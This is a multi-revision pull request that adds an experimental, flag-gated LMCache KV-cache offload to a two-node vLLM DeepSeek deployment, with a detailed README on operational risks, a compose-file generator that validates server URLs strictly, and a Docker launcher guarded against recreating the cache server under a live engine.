### PR TITLE
Experimental opt-in: LMCache KV offload (107K-token reload in ~1.9s vs ~65s re-prefill)

### DIFF
--- a/lmcache/README.md
+++ b/lmcache/README.md
@@ -51,7 +51,9 @@ crash and does not fall back to re-prefill, so an operator watching only for
 container exits sees a healthy pair serving nothing. The only reliable signal
 is the server's own exit plus `No GPU context found` in its log — which is why
 the launcher uses `--restart no` (a dead server must stay dead and visible)
-and refuses to replace a running server unless `LMCACHE_FORCE_REPLACE=1`.
+and will not recreate the server at all while a `vllm-dspark` model container
+is running: the fresh-server-under-live-engine case IS this wedge, so the only
+supported recovery is a full-pair restart (servers first, then the engine).
 Once LMCache PR #4764 lands the parks become graceful degradation; until then,
 **the blast radius of a dead cache server is the model service.**
 
@@ -73,7 +75,8 @@ the upstream heartbeat fix lands.
   and `unset PYTORCH_CUDA_ALLOC_CONF` (vLLM rejects KV connectors alongside
   `expandable_segments:True`). The stock `PYTORCH_CUDA_ALLOC_CONF` service
   env entry is left untouched and no `PYTHONHASHSEED` env entry is added, so
-  with the flag off the engine process gets stock env and stock argv.
+  with the flag off the engine keeps stock allocator/hash behaviour and stock
+  argv; the config still differs from stock by the two inert deltas below.
 - Launch with
   `COMPOSE_FILE=$PWD/docker-compose.lmcache.yml ./start-deepseek-v4-flash-dspark.sh`.
 
@@ -146,8 +149,13 @@ COMPOSE_FILE=$PWD/docker-compose.lmcache.yml ./start-deepseek-v4-flash-dspark.sh
 
 Knobs on `run-lmcache-server.sh`: `LMCACHE_DISK_DIR`, `LMCACHE_L1_GB`,
 `LMCACHE_PORT`, `LMCACHE_OOM_SCORE_ADJ` (default `0`), and
-`LMCACHE_FORCE_REPLACE=1` to override the guard that refuses to replace a
-server that is currently running.
+`LMCACHE_FORCE_REPLACE=1` to override the guard against re-creating a
+currently-running server. It applies only when the pair is actually down:
+while any model container is live, server re-creation is refused
+unconditionally (see Operational risk 3). "Model container" means either a
+compose container labelled `com.docker.compose.service=vllm-dspark` or any
+container whose name contains `vllm-dspark` (deliberately over-eager —
+refusing too hard is the safe side of the wedge).
 
 With `DSPARK_ENABLE_LMCACHE` unset, `0`, or anything other than exactly `1`,
 the generated compose boots the stock recipe unchanged — every LMCache change
@@ -161,9 +169,12 @@ diff <(docker compose -f docker-compose.dspark.yml config) \
 
 with the flag unset, the only deltas are inert: an added
 `DSPARK_ENABLE_LMCACHE: "0"` pass-through, the `KVT_ARGS=""` gate, and an
-empty `$${KVT_ARGS}` expansion in the serve argv. `PYTORCH_CUDA_ALLOC_CONF`
-still renders as `expandable_segments:True` and `PYTHONHASHSEED` is absent,
-exactly as on stock.
+empty `$${KVT_ARGS}` expansion in the serve argv (an empty unquoted expansion
+adds no argument, so the exec'd argv is unchanged). The env is therefore not
+literally byte-identical to stock — the inert `DSPARK_ENABLE_LMCACHE=0`
+variable is added — but no stock behaviour depends on it.
+`PYTORCH_CUDA_ALLOC_CONF` still renders as `expandable_segments:True` and
+`PYTHONHASHSEED` is absent from the service env, exactly as on stock.
 
 To verify it's working: the head engine log shows `LMCacheMPConnector`
 at startup, and a repeated long-context request logs a lookup hit with TTFT

--- a/lmcache/README.md
+++ b/lmcache/README.md
@@ -7,18 +7,75 @@ GB10 pair, `nvfp4_ds_mla`). KV is held by per-node `lmcache server` processes
 
 **Status: experimental.** Serving-path verified (boot, store, warm hits,
 reload) across repeated trials; the *failure paths* upstream are still being
-hardened — see Known issues. Do not enable on a pair you cannot restart.
+hardened — see Operational risk and Known issues. Do not enable on a pair you
+cannot restart.
+
+## Operational risk — owner decision required
+
+Enabling this is an explicit operational trade-off, not a free win. The
+failure modes below are known and **not** fully mitigated in this option
+directory; an owner has to accept them before turning the flag on.
+
+**1. The cache servers live outside Compose.** `run-lmcache-server.sh` starts
+one plain `docker run` container per node. Compose does not know about it, so
+it is not started, stopped, restarted, health-checked or supervised with the
+model containers, and `./stop-deepseek-v4-flash-dspark.sh` leaves it running.
+Boot order is therefore manual and load-bearing: **every node's server must be
+up and verified before the engine starts.** The engine's connector is
+constructed at boot; a missing server at engine-boot time was not exercised in
+this PR's testing, so treat it as unverified rather than as a soft failure.
+The launcher prints its verification line only after the container is running
+*and* the ZMQ port answers; anything else exits non-zero.
+
+**2. Confirmed unified-memory cold-boot OOM.** On 128 GB unified-memory nodes
+the kernel global OOM killer has killed the `lmcache server` process during an
+engine **cold boot** — the weight-load spike lands on top of the server's
+resident L1. Confirmed from `dmesg` on the head node (reported upstream on
+LMCache #4759). *Symptom:* the server container is gone (or `docker ps` shows
+it exited) while the engine boots or shortly after; from the engine's side
+this then presents as case 3 below, not as an obvious error. *Recovery:*
+restart the whole pair — servers first, then the engine. *Reductions:* size L1
+so the server is not the fattest process on the board (`LMCACHE_L1_GB`), and
+optionally set `LMCACHE_OOM_SCORE_ADJ` to a negative value (e.g. `-500`) so
+the killer prefers the engine, which Compose restarts, over the server, which
+nothing restarts. That knob defaults to `0` (kernel default, no change)
+because it is a node-wide policy choice, not ours to make.
+
+**3. A cache server that dies mid-serve takes the engine with it — silently.**
+This is a **hang, not graceful degradation**. A server that is restarted or
+killed loses its GPU contexts; the current upstream code then *parks every
+lookup-hit request forever* — the scheduler heartbeat never starts, so dead
+servers stay "healthy", and lookup errors do not propagate to the request.
+Requests that would have hit the cache stop returning; the engine does not
+crash and does not fall back to re-prefill, so an operator watching only for
+container exits sees a healthy pair serving nothing. The only reliable signal
+is the server's own exit plus `No GPU context found` in its log — which is why
+the launcher uses `--restart no` (a dead server must stay dead and visible)
+and refuses to replace a running server unless `LMCACHE_FORCE_REPLACE=1`.
+Once LMCache PR #4764 lands the parks become graceful degradation; until then,
+**the blast radius of a dead cache server is the model service.**
+
+**Owner decision:** turn this on only where a full pair restart is acceptable
+at any moment, server exits are alerted on, and someone is on the hook to do
+the restart. Otherwise leave `DSPARK_ENABLE_LMCACHE` unset. Moving the servers
+into Compose would not fix 2 or 3 — Compose restarting an emptied server is
+exactly the wedge in case 3 — so it is deliberately left out of scope until
+the upstream heartbeat fix lands.
 
 ## How it fits this recipe
 
 - One `lmcache server` container per node (see `run-lmcache-server.sh`),
-  ZMQ on the fabric IPs.
+  ZMQ on the fabric IPs. Outside Compose — see Operational risk.
 - `patch-compose-lmcache.py` generates `docker-compose.lmcache.yml` from
-  `docker-compose.dspark.yml`: injects `--kv-transfer-config` for
-  `LMCacheMPConnector` (gated on `DSPARK_ENABLE_LMCACHE=1`), passes
-  `PYTHONHASHSEED=0`, and clears `PYTORCH_CUDA_ALLOC_CONF`
-  (vLLM rejects KV connectors alongside `expandable_segments:True`).
-- Launch with `COMPOSE_FILE=$PWD/docker-compose.lmcache.yml ./start-…sh`.
+  `docker-compose.dspark.yml`. **Every** LMCache-specific change sits inside
+  one entrypoint branch taken only when `DSPARK_ENABLE_LMCACHE` is exactly
+  `1`: `--kv-transfer-config` for `LMCacheMPConnector`, `PYTHONHASHSEED=0`,
+  and `unset PYTORCH_CUDA_ALLOC_CONF` (vLLM rejects KV connectors alongside
+  `expandable_segments:True`). The stock `PYTORCH_CUDA_ALLOC_CONF` service
+  env entry is left untouched and no `PYTHONHASHSEED` env entry is added, so
+  with the flag off the engine process gets stock env and stock argv.
+- Launch with
+  `COMPOSE_FILE=$PWD/docker-compose.lmcache.yml ./start-deepseek-v4-flash-dspark.sh`.
 
 ## Requirements baked into a derived image (the pinned Anemll image lacks them)
 
@@ -38,7 +95,9 @@ fill cusparse/cusolver/cufft headers from the `nvidia-*-cu13` pip wheels).
 
 - **`PYTHONHASHSEED=0` on every process** (servers AND engine): chunk keys use
   Python's randomized `hash()`; without pinning, every restart invalidates the
-  entire cache (LMCache #1788).
+  entire cache (LMCache #1788). `run-lmcache-server.sh` passes it to the
+  server; the generated compose exports it into the engine, but only inside
+  the `DSPARK_ENABLE_LMCACHE=1` branch — never on the stock path.
 - **L1 sized to hold your largest context** (`--l1-size-gb 12` for ~150K-token
   docs) — mid-store L1 eviction has stalled stores in our testing.
 - **Treat the pair + servers as one lifecycle unit.** Restarting a server
@@ -47,6 +106,9 @@ fill cusparse/cusolver/cufft headers from the `nvidia-*-cu13` pip wheels).
   LMCache PR #4764 — plus non-propagating lookup errors). Until those land:
   run servers with `--restart no`, alert on server exit, and on ANY
   `No GPU context found` in a server log, restart the whole pair.
+- **Servers up before the engine, on every node.** The launcher exits non-zero
+  unless its container is running and its port answers; do not proceed on a
+  non-zero exit.
 
 ## Known issues (upstream)
 
@@ -55,31 +117,53 @@ fill cusparse/cusolver/cufft headers from the `nvidia-*-cu13` pip wheels).
   "healthy" forever); merged = parks become graceful degradation
 - LMCache PR #4754 — timeline-semaphore event IPC selector (defensive on
   driver 580/CUDA 13 platforms)
-- Servers can exit under engine-boot memory pressure on 128 GB unified-memory
-  nodes (engine weight-load spike + resident L1); monitor them.
+- Kernel global OOM kill of the server during engine **cold boot** on 128 GB
+  unified-memory nodes (engine weight-load spike + resident L1) — confirmed
+  from `dmesg`, reported on LMCache #4759. See Operational risk (2).
 
 ## Usage
 
 On each node, from the recipe checkout (derived image already built):
 
 ```
-# 1. one server per node, bound to THAT node's fabric IP
+# 1. one server per node, bound to THAT node's fabric IP. Both must print
+#    their "lmcache server up ..." line BEFORE step 3 — the script preflights
+#    the image (cupy/lmcache importable), the IP, and the L2 dir, then verifies
+#    the container is running and the port answers. Non-zero exit = do not boot.
 ./lmcache/run-lmcache-server.sh 192.168.104.10        # head
 ./lmcache/run-lmcache-server.sh 192.168.104.11        # worker
 
-# 2. generate the compose overlay (once, same file both nodes)
+# 2. generate the compose overlay (once; start-deepseek-v4-flash-dspark.sh
+#    scp's $COMPOSE_FILE to the worker for you)
 python3 lmcache/patch-compose-lmcache.py \
   docker-compose.dspark.yml docker-compose.lmcache.yml \
   tcp://192.168.104.10:6667,tcp://192.168.104.11:6667
 
 # 3. enable + launch through the normal recipe entry point
 export DSPARK_ENABLE_LMCACHE=1
-COMPOSE_FILE=$PWD/docker-compose.lmcache.yml ./start-deepseek-v4-flash.sh
+COMPOSE_FILE=$PWD/docker-compose.lmcache.yml ./start-deepseek-v4-flash-dspark.sh
 ```
 
-With `DSPARK_ENABLE_LMCACHE` unset (or `0`) the generated compose boots the
-stock recipe unchanged — the connector args are gated at runtime, so one
-compose file serves both modes.
+Knobs on `run-lmcache-server.sh`: `LMCACHE_DISK_DIR`, `LMCACHE_L1_GB`,
+`LMCACHE_PORT`, `LMCACHE_OOM_SCORE_ADJ` (default `0`), and
+`LMCACHE_FORCE_REPLACE=1` to override the guard that refuses to replace a
+server that is currently running.
+
+With `DSPARK_ENABLE_LMCACHE` unset, `0`, or anything other than exactly `1`,
+the generated compose boots the stock recipe unchanged — every LMCache change
+is gated at runtime, so one compose file serves both modes. Verify for
+yourself:
+
+```
+diff <(docker compose -f docker-compose.dspark.yml config) \
+     <(docker compose -f docker-compose.lmcache.yml config)
+```
+
+with the flag unset, the only deltas are inert: an added
+`DSPARK_ENABLE_LMCACHE: "0"` pass-through, the `KVT_ARGS=""` gate, and an
+empty `$${KVT_ARGS}` expansion in the serve argv. `PYTORCH_CUDA_ALLOC_CONF`
+still renders as `expandable_segments:True` and `PYTHONHASHSEED` is absent,
+exactly as on stock.
 
 To verify it's working: the head engine log shows `LMCacheMPConnector`
 at startup, and a repeated long-context request logs a lookup hit with TTFT

--- a/lmcache/README.md
+++ b/lmcache/README.md
@@ -1,0 +1,86 @@
+# EXPERIMENTAL: LMCache KV offload for the 2× Spark pair
+
+Persistent KV cache across engine restarts: a ~107K-token context that costs
+~65 s to re-prefill reloads in **~1.8–1.9 s** (measured n=2 on this recipe,
+GB10 pair, `nvfp4_ds_mla`). KV is held by per-node `lmcache server` processes
+(L1 CPU + filesystem L2 on the local NVMe) that survive engine restarts.
+
+**Status: experimental.** Serving-path verified (boot, store, warm hits,
+reload) across repeated trials; the *failure paths* upstream are still being
+hardened — see Known issues. Do not enable on a pair you cannot restart.
+
+## How it fits this recipe
+
+- One `lmcache server` container per node (see `run-lmcache-server.sh`),
+  ZMQ on the fabric IPs.
+- `patch-compose-lmcache.py` generates `docker-compose.lmcache.yml` from
+  `docker-compose.dspark.yml`: injects `--kv-transfer-config` for
+  `LMCacheMPConnector` (gated on `DSPARK_ENABLE_LMCACHE=1`), passes
+  `PYTHONHASHSEED=0`, and clears `PYTORCH_CUDA_ALLOC_CONF`
+  (vLLM rejects KV connectors alongside `expandable_segments:True`).
+- Launch with `COMPOSE_FILE=$PWD/docker-compose.lmcache.yml ./start-…sh`.
+
+## Requirements baked into a derived image (the pinned Anemll image lacks them)
+
+```
+pip install --no-deps lmcache==0.5.4
+pip install sortedcontainers aiofile aiofiles cupy-cuda13x
+```
+`cupy` matters: without it the server *silently* fails GPU-context creation
+and every engine registration kills the vLLM head (LMCache #4759 covers the
+fail-fast ask). The lmcache wheel's bundled `cuda_ops` is ABI-mismatched
+against this image's torch — it soft-falls back to torch ops (works; slower
+stores). Building it from source against the image's torch works
+(`TORCH_CUDA_ARCH_LIST=12.1a`; the image's CUDA toolkit is header-trimmed —
+fill cusparse/cusolver/cufft headers from the `nvidia-*-cu13` pip wheels).
+
+## Non-negotiable configuration
+
+- **`PYTHONHASHSEED=0` on every process** (servers AND engine): chunk keys use
+  Python's randomized `hash()`; without pinning, every restart invalidates the
+  entire cache (LMCache #1788).
+- **L1 sized to hold your largest context** (`--l1-size-gb 12` for ~150K-token
+  docs) — mid-store L1 eviction has stalled stores in our testing.
+- **Treat the pair + servers as one lifecycle unit.** Restarting a server
+  loses its GPU contexts; the current upstream code then parks every
+  lookup-hit request forever (scheduler heartbeat bug — fix upstream as
+  LMCache PR #4764 — plus non-propagating lookup errors). Until those land:
+  run servers with `--restart no`, alert on server exit, and on ANY
+  `No GPU context found` in a server log, restart the whole pair.
+
+## Known issues (upstream)
+
+- LMCache #4759 — the full GB10 field report (hang modes, evidence, stacks)
+- LMCache PR #4764 — scheduler heartbeat never starts (dead servers stay
+  "healthy" forever); merged = parks become graceful degradation
+- LMCache PR #4754 — timeline-semaphore event IPC selector (defensive on
+  driver 580/CUDA 13 platforms)
+- Servers can exit under engine-boot memory pressure on 128 GB unified-memory
+  nodes (engine weight-load spike + resident L1); monitor them.
+
+## Usage
+
+On each node, from the recipe checkout (derived image already built):
+
+```
+# 1. one server per node, bound to THAT node's fabric IP
+./lmcache/run-lmcache-server.sh 192.168.104.10        # head
+./lmcache/run-lmcache-server.sh 192.168.104.11        # worker
+
+# 2. generate the compose overlay (once, same file both nodes)
+python3 lmcache/patch-compose-lmcache.py \
+  docker-compose.dspark.yml docker-compose.lmcache.yml \
+  tcp://192.168.104.10:6667,tcp://192.168.104.11:6667
+
+# 3. enable + launch through the normal recipe entry point
+export DSPARK_ENABLE_LMCACHE=1
+COMPOSE_FILE=$PWD/docker-compose.lmcache.yml ./start-deepseek-v4-flash.sh
+```
+
+With `DSPARK_ENABLE_LMCACHE` unset (or `0`) the generated compose boots the
+stock recipe unchanged — the connector args are gated at runtime, so one
+compose file serves both modes.
+
+To verify it's working: the head engine log shows `LMCacheMPConnector`
+at startup, and a repeated long-context request logs a lookup hit with TTFT
+dropping from full-prefill cost to ~2 s.

--- a/lmcache/patch-compose-lmcache.py
+++ b/lmcache/patch-compose-lmcache.py
@@ -1,14 +1,23 @@
 #!/usr/bin/env python3
 """Generate docker-compose.lmcache.yml from docker-compose.dspark.yml.
 
-Adds, gated on DSPARK_ENABLE_LMCACHE=1:
+Every LMCache-specific change is applied inside one entrypoint branch that is
+taken only when DSPARK_ENABLE_LMCACHE is exactly "1" (repo convention, same
+shape as DSPARK_ENABLE_ISSUE31_GPU_HOTFIX / DSPARK_ENABLE_ASSISTANT_FINAL_HOTFIX).
+Inside that branch, immediately before `exec vllm serve`:
   - the LMCacheMPConnector --kv-transfer-config (hardcoded escaped JSON in the
     compose command: .env values are bash-sourced by the launcher, which
     strips quotes, so JSON cannot ride an env var in this stack)
-  - PYTHONHASHSEED=0 in the container env (chunk keys use Python's randomized
-    hash(); unpinned, every restart invalidates the whole cache)
-  - clears PYTORCH_CUDA_ALLOC_CONF (vLLM rejects KV connectors alongside
+  - export PYTHONHASHSEED=0 (chunk keys use Python's randomized hash();
+    unpinned, every restart invalidates the whole cache)
+  - unset PYTORCH_CUDA_ALLOC_CONF (vLLM rejects KV connectors alongside
     expandable_segments:True)
+
+With the flag unset or 0 the branch is not taken, so the engine process gets
+byte-identical env and argv to stock: the stock PYTORCH_CUDA_ALLOC_CONF
+service env entry is left untouched and no PYTHONHASHSEED entry is added.
+The only additions to the rendered config are inert: the DSPARK_ENABLE_LMCACHE
+pass-through (default "0") and an empty $${KVT_ARGS} expansion.
 
 Usage:
   patch-compose-lmcache.py <src> <dst> <server-urls>
@@ -35,7 +44,9 @@ s = s.replace(
     a1
     + '\n        KVT_ARGS="";'
     + '\n        if [ "$${DSPARK_ENABLE_LMCACHE:-0}" = "1" ]; then'
-    + ' KVT_ARGS="--kv-transfer-config ' + kvt + '"; fi;',
+    + ' KVT_ARGS="--kv-transfer-config ' + kvt + '";'
+    + ' export PYTHONHASHSEED=0;'
+    + ' unset PYTORCH_CUDA_ALLOC_CONF; fi;',
     1,
 )
 
@@ -44,18 +55,21 @@ assert a2 in s, "anchor (serve args) not found"
 s = s.replace(a2, a2 + "        $${KVT_ARGS}\n", 1)
 
 a3 = 'PYTORCH_CUDA_ALLOC_CONF: "${PYTORCH_CUDA_ALLOC_CONF:-expandable_segments:True}"'
-assert a3 in s, "anchor (alloc conf) not found"
-s = s.replace(a3, 'PYTORCH_CUDA_ALLOC_CONF: "${PYTORCH_CUDA_ALLOC_CONF_LMC:-}"', 1)
+assert a3 in s, "anchor (alloc conf) not found — compose layout changed?"
 
 a4 = "      HF_HOME: /cache/huggingface\n"
 assert a4 in s, "anchor (env block) not found"
 s = s.replace(
     a4,
-    a4
-    + '      DSPARK_ENABLE_LMCACHE: "${DSPARK_ENABLE_LMCACHE:-0}"\n'
-    + '      PYTHONHASHSEED: "0"\n',
+    a4 + '      DSPARK_ENABLE_LMCACHE: "${DSPARK_ENABLE_LMCACHE:-0}"\n',
     1,
 )
+
+# Opt-in boundary, enforced here so a future edit cannot quietly reintroduce an
+# unconditional env change: with the flag off the engine must see stock env.
+assert a3 in s, "generated compose must leave the stock PYTORCH_CUDA_ALLOC_CONF entry intact"
+assert "\n      PYTHONHASHSEED:" not in s, "PYTHONHASHSEED must be exported inside the gate, not set in the service env"
+assert s.count("DSPARK_ENABLE_LMCACHE") == 3, "expected exactly one gate plus one env pass-through"
 
 open(dst, "w").write(s)
 print("wrote", dst)

--- a/lmcache/patch-compose-lmcache.py
+++ b/lmcache/patch-compose-lmcache.py
@@ -1,0 +1,61 @@
+#!/usr/bin/env python3
+"""Generate docker-compose.lmcache.yml from docker-compose.dspark.yml.
+
+Adds, gated on DSPARK_ENABLE_LMCACHE=1:
+  - the LMCacheMPConnector --kv-transfer-config (hardcoded escaped JSON in the
+    compose command: .env values are bash-sourced by the launcher, which
+    strips quotes, so JSON cannot ride an env var in this stack)
+  - PYTHONHASHSEED=0 in the container env (chunk keys use Python's randomized
+    hash(); unpinned, every restart invalidates the whole cache)
+  - clears PYTORCH_CUDA_ALLOC_CONF (vLLM rejects KV connectors alongside
+    expandable_segments:True)
+
+Usage:
+  patch-compose-lmcache.py <src> <dst> <server-urls>
+  server-urls: comma-separated, e.g.
+    tcp://192.168.104.10:6667,tcp://192.168.104.11:6667
+"""
+import sys
+
+if len(sys.argv) != 4:
+    sys.exit(__doc__)
+src, dst, urls = sys.argv[1], sys.argv[2], sys.argv[3]
+if any(c in urls for c in ' "\\'):
+    sys.exit("server-urls must not contain spaces, quotes, or backslashes")
+s = open(src).read()
+
+a1 = 'if [ -n "$${DSPARK_REVISION:-}" ]; then REVISION_ARGS="--revision $${DSPARK_REVISION}"; fi;'
+assert a1 in s, "anchor (REVISION_ARGS) not found — compose layout changed?"
+kvt = (
+    '{\\"kv_connector\\":\\"LMCacheMPConnector\\",\\"kv_role\\":\\"kv_both\\",'
+    '\\"kv_connector_extra_config\\":{\\"lmcache.mp.server_urls\\":\\"' + urls + '\\"}}'
+)
+s = s.replace(
+    a1,
+    a1
+    + '\n        KVT_ARGS="";'
+    + '\n        if [ "$${DSPARK_ENABLE_LMCACHE:-0}" = "1" ]; then'
+    + ' KVT_ARGS="--kv-transfer-config ' + kvt + '"; fi;',
+    1,
+)
+
+a2 = "        $${VLLM_QUANTIZATION_ARGS}\n"
+assert a2 in s, "anchor (serve args) not found"
+s = s.replace(a2, a2 + "        $${KVT_ARGS}\n", 1)
+
+a3 = 'PYTORCH_CUDA_ALLOC_CONF: "${PYTORCH_CUDA_ALLOC_CONF:-expandable_segments:True}"'
+assert a3 in s, "anchor (alloc conf) not found"
+s = s.replace(a3, 'PYTORCH_CUDA_ALLOC_CONF: "${PYTORCH_CUDA_ALLOC_CONF_LMC:-}"', 1)
+
+a4 = "      HF_HOME: /cache/huggingface\n"
+assert a4 in s, "anchor (env block) not found"
+s = s.replace(
+    a4,
+    a4
+    + '      DSPARK_ENABLE_LMCACHE: "${DSPARK_ENABLE_LMCACHE:-0}"\n'
+    + '      PYTHONHASHSEED: "0"\n',
+    1,
+)
+
+open(dst, "w").write(s)
+print("wrote", dst)

--- a/lmcache/patch-compose-lmcache.py
+++ b/lmcache/patch-compose-lmcache.py
@@ -13,24 +13,81 @@ Inside that branch, immediately before `exec vllm serve`:
   - unset PYTORCH_CUDA_ALLOC_CONF (vLLM rejects KV connectors alongside
     expandable_segments:True)
 
-With the flag unset or 0 the branch is not taken, so the engine process gets
-byte-identical env and argv to stock: the stock PYTORCH_CUDA_ALLOC_CONF
-service env entry is left untouched and no PYTHONHASHSEED entry is added.
-The only additions to the rendered config are inert: the DSPARK_ENABLE_LMCACHE
-pass-through (default "0") and an empty $${KVT_ARGS} expansion.
+With the flag unset or 0 the branch is not taken: the stock
+PYTORCH_CUDA_ALLOC_CONF service env entry is left untouched and no
+PYTHONHASHSEED entry is added, so the engine keeps stock allocator/hash
+behaviour and stock argv. The rendered config is NOT byte-identical to stock:
+two inert deltas are always present — the DSPARK_ENABLE_LMCACHE pass-through
+(default "0") in the service env, and an empty $${KVT_ARGS} expansion in the
+serve argv (empty unquoted expansion adds no argument).
+
+server-urls is strictly parsed (see MP_URL): the value is embedded in the
+compose entrypoint inside a double-quoted shell string, so only
+comma-separated tcp://host:port over an IPv4 literal or RFC1123 hostname is
+accepted; anything else — shell punctuation ($ ` ; & | ( ) < > [ ] etc.),
+quotes, spaces, control characters, bad schemes, leading-zero or
+out-of-range ports — is refused at generation time. IPv6 literals are not
+accepted: this recipe's fabric is IPv4-only (the server launcher's own
+preflight binds IPv4 addresses).
 
 Usage:
   patch-compose-lmcache.py <src> <dst> <server-urls>
   server-urls: comma-separated, e.g.
     tcp://192.168.104.10:6667,tcp://192.168.104.11:6667
 """
+import re
 import sys
 
 if len(sys.argv) != 4:
     sys.exit(__doc__)
 src, dst, urls = sys.argv[1], sys.argv[2], sys.argv[3]
-if any(c in urls for c in ' "\\'):
-    sys.exit("server-urls must not contain spaces, quotes, or backslashes")
+
+# Strict grammar: tcp://<ipv4-or-hostname>:<1-65535>, comma-separated, nothing
+# else. Whitelist-style — anything outside it (including every shell
+# metacharacter and control character) fails fullmatch and is refused.
+MP_URL = re.compile(
+    r"tcp://"
+    r"(?P<host>[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
+    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*)"
+    r":(?P<port>[1-9][0-9]{0,4})"
+)
+
+
+def check_server_urls(raw):
+    if not raw:
+        sys.exit("error: server-urls must list at least one tcp://host:port")
+    for part in raw.split(","):
+        m = MP_URL.fullmatch(part)  # fullmatch: also rejects embedded newlines
+        if not m:
+            sys.exit(
+                "error: server-urls entry " + repr(part) + " must match "
+                "tcp://host:port — tcp scheme, IPv4 or hostname, numeric port "
+                "1-65535; no spaces, quotes, or shell metacharacters"
+            )
+        if int(m.group("port")) > 65535:
+            sys.exit("error: server-urls entry " + repr(part) + ": port must be <= 65535")
+        host = m.group("host")
+        if len(host) > 253:
+            sys.exit("error: server-urls entry " + repr(part) + ": host too long")
+        # A host made only of digits and dots is an intended IPv4 literal, so it
+        # must be a valid dotted quad — the RFC1123 hostname branch would
+        # otherwise swallow typos like 999.999.999.999 or 01.2.3.4 verbatim,
+        # deferring the failure to connect time. (Mixed hosts like
+        # "10.server.example" stay valid hostnames.)
+        if "." in host and all(c.isdigit() or c == "." for c in host):
+            octets = host.split(".")
+            if len(octets) != 4 or any(
+                not o or not o.isdigit() or len(o) > 3 or int(o) > 255
+                or (len(o) > 1 and o[0] == "0")
+                for o in octets
+            ):
+                sys.exit(
+                    "error: server-urls entry " + repr(part) + ": host looks like "
+                    "an IPv4 address but is not a valid dotted quad"
+                )
+
+
+check_server_urls(urls)
 s = open(src).read()
 
 a1 = 'if [ -n "$${DSPARK_REVISION:-}" ]; then REVISION_ARGS="--revision $${DSPARK_REVISION}"; fi;'

--- a/lmcache/run-lmcache-server.sh
+++ b/lmcache/run-lmcache-server.sh
@@ -1,0 +1,21 @@
+#!/usr/bin/env bash
+# Launch the per-node LMCache MP server. Run once per node with that node's
+# fabric IP. Requires the derived image (see README.md).
+set -euo pipefail
+FABRIC_IP="${1:?usage: run-lmcache-server.sh <this-node-fabric-ip> [image]}"
+IMAGE="${2:-dspark-vllm-gx10:lmcache054}"
+DISK="${LMCACHE_DISK_DIR:-$HOME/lmcache-disk}"
+mkdir -p "$DISK"
+docker rm -f lmcache-server >/dev/null 2>&1 || true
+# --restart no is deliberate: a dead server must be VISIBLE (see README —
+# an auto-restarted empty server currently wedges the engine silently).
+docker run -d --name lmcache-server --network host --ipc host --gpus all \
+  --restart no \
+  -e PYTHONHASHSEED=0 \
+  -v "$DISK:/lmcache-disk" \
+  --entrypoint lmcache "$IMAGE" server \
+  --host "$FABRIC_IP" --port 6667 --chunk-size 256 \
+  --l1-size-gb "${LMCACHE_L1_GB:-12}" --l1-use-lazy --eviction-policy LRU \
+  --l2-adapter '{"type":"fs","base_path":"/lmcache-disk"}' \
+  --disable-observability
+echo "lmcache server up on ${FABRIC_IP}:6667 (L1 ${LMCACHE_L1_GB:-12}G, fs L2 at $DISK)"

--- a/lmcache/run-lmcache-server.sh
+++ b/lmcache/run-lmcache-server.sh
@@ -38,13 +38,47 @@ docker run --rm --entrypoint python3 "$IMAGE" -c 'import cupy, lmcache' >/dev/nu
 mkdir -p "$DISK" || die "cannot create L2 dir $DISK"
 [ -w "$DISK" ] || die "L2 dir $DISK is not writable"
 
-# Replacing a LIVE server is the documented wedge condition: the replacement
-# comes up with no GPU contexts and the engine parks every lookup hit forever.
-if [ -n "$(docker ps -q -f name="^lmcache-server$")" ]; then
+# Replacing a cache server under a LIVE engine is the documented wedge
+# condition, so two guards stand between here and the docker rm below:
+#
+# Guard 1 — the model container. The real-world failure mode is a DEAD server
+# under a LIVE (wedged) engine (README 'Operational risk' 2+3); proceeding
+# there would rm + recreate an EMPTY server against that engine — the wedge
+# itself. So this refusal has NO override: LMCACHE_FORCE_REPLACE is documented
+# to mean "the pair is already down", and a live model container falsifies
+# that claim. Stop the pair first; the recovery is a full-pair restart.
+# Fail CLOSED: a docker-ps failure here must not be read as "nothing is
+# running" — that would take the guard down exactly when the host is sick.
+if ! model_ps_a="$(docker ps -q -f 'name=vllm-dspark' 2>&1)"; then
+  die "docker ps (name filter) failed — refusing to recreate the cache server without trustworthy state: $model_ps_a"
+fi
+if ! model_ps_b="$(docker ps -q -f 'label=com.docker.compose.service=vllm-dspark' 2>&1)"; then
+  die "docker ps (compose service label filter) failed — refusing to recreate the cache server without trustworthy state: $model_ps_b"
+fi
+# NOTE: the name filter is a substring match on purpose. It is strictly
+# over-eager (any container whose name contains vllm-dspark) and it also
+# catches hand-run engine containers that carry no compose labels. Refusing
+# too hard is the safe side of the wedge; the label filter covers the
+# compose-managed case precisely.
+if [ -n "$model_ps_a" ] || [ -n "$model_ps_b" ]; then
+  die "a model (vllm-dspark) container is RUNNING. Recreating the lmcache server
+       under a live engine is the documented wedge (README 'Operational risk'):
+       the fresh server has no GPU contexts and the engine parks every lookup
+       hit forever. Stop the whole pair first
+       (./stop-deepseek-v4-flash-dspark.sh), then re-run this script.
+       LMCACHE_FORCE_REPLACE does NOT bypass this guard."
+fi
+
+# Guard 2 — a still-running (possibly poisoned) server. Overridable only for
+# the legitimate pair-is-down case: stale/empty server, no engine running.
+if ! server_ps="$(docker ps -q -f 'name=^lmcache-server$' 2>&1)"; then
+  die "docker ps (server filter) failed — refusing to recreate the cache server without trustworthy state: $server_ps"
+fi
+if [ -n "$server_ps" ]; then
   [ "${LMCACHE_FORCE_REPLACE:-0}" = "1" ] \
-    || die "lmcache-server is already RUNNING. Replacing it wedges a live engine
-       (see README, 'Operational risk'). Stop the pair first, or re-run with
-       LMCACHE_FORCE_REPLACE=1 if the pair is already down."
+    || die "lmcache-server is already RUNNING and no model container is up.
+       Only re-create it with LMCACHE_FORCE_REPLACE=1 if the pair is already
+       down (e.g. stale server from an aborted boot)."
 fi
 docker rm -f lmcache-server >/dev/null 2>&1 || true
 

--- a/lmcache/run-lmcache-server.sh
+++ b/lmcache/run-lmcache-server.sh
@@ -1,21 +1,77 @@
 #!/usr/bin/env bash
 # Launch the per-node LMCache MP server. Run once per node with that node's
 # fabric IP. Requires the derived image (see README.md).
+#
+# Boot order is load-bearing: BOTH servers must be up and verified here BEFORE
+# the engine starts (see README, "Operational risk"). This script fails loudly
+# rather than leaving a half-up server behind a green exit code.
 set -euo pipefail
